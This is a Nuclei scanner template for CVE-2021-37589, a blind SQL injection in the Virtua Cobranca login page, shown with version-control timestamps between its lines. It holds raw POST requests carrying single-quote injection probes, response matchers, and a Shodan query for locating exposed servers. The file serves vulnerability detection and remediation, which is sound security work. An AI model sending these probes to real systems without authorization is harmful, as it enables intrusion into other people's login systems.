2022-06-09 07:45:44 +00:00
|
|
|
id: CVE-2021-37589
|
2022-08-22 07:17:05 +00:00
|
|
|
|
2022-06-09 07:45:44 +00:00
|
|
|
info:
|
2022-06-30 14:49:47 +00:00
|
|
|
name: Virtua Software Cobranca <12R - Blind SQL Injection
|
2022-06-09 07:45:44 +00:00
|
|
|
author: princechaddha
|
|
|
|
severity: high
|
|
|
|
description: |
|
2022-06-30 14:49:47 +00:00
|
|
|
Virtua Cobranca before 12R allows blind SQL injection on the login page.
|
2023-09-06 12:09:01 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Virtua Software Cobranca <12R.
|
2022-06-09 07:45:44 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589
|
|
|
|
- https://www.virtuasoftware.com.br/
|
2022-06-09 08:28:18 +00:00
|
|
|
- https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br
|
2022-06-30 14:49:47 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-37589
|
2022-06-15 07:50:14 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2021-37589
|
|
|
|
cwe-id: CWE-89
|
2023-07-11 19:49:27 +00:00
|
|
|
epss-score: 0.0051
|
2023-10-31 18:27:55 +00:00
|
|
|
epss-percentile: 0.73949
|
2023-09-06 12:09:01 +00:00
|
|
|
cpe: cpe:2.3:a:virtuasoftware:cobranca:*:*:*:*:*:*:*:*
|
2022-06-09 07:45:44 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 12:09:01 +00:00
|
|
|
max-request: 3
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: virtuasoftware
|
|
|
|
product: cobranca
|
2023-09-06 12:09:01 +00:00
|
|
|
shodan-query: http.favicon.hash:876876147
|
2022-06-09 07:45:44 +00:00
|
|
|
tags: cve,cve2021,virtua,sqli
|
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-06-09 07:45:44 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
- |
|
|
|
|
POST /controller/login.php?acao=autenticar HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
X-Requested-With: XMLHttpRequest
|
|
|
|
|
|
|
|
idusuario='&idsenha=test&tipousr=Usuario
|
|
|
|
- |
|
|
|
|
POST /controller/login.php?acao=autenticar HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
X-Requested-With: XMLHttpRequest
|
|
|
|
|
|
|
|
idusuario=''&idsenha=a&tipousr=Usuario
|
|
|
|
|
|
|
|
cookie-reuse: true
|
|
|
|
req-condition: true
|
2023-07-11 19:49:27 +00:00
|
|
|
|
2022-06-09 07:45:44 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- 'contains(body_3, "Os parametros não estão informados corretamente")'
|
|
|
|
- 'contains(body_3, "O CNPJ dos parametro não está informado corretamente")'
|
|
|
|
condition: or
|
2022-06-30 14:49:47 +00:00
|
|
|
|
2022-07-02 11:45:30 +00:00
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- "status_code_2 == 500 && status_code_3 == 200"
|
2023-11-01 14:09:41 +00:00
|
|
|
# digest: 4a0a00473045022100f8d5d5a80a1f2c5cb5c6c74c65a2e6798193bf99040662a4ee124627995e9c9602207dd8fb8d067dd5475f95b7a00bf0ea744e3d43360042b93cf84f94090ef6bec9:922c64590222798bb761d5b6d8e72950
|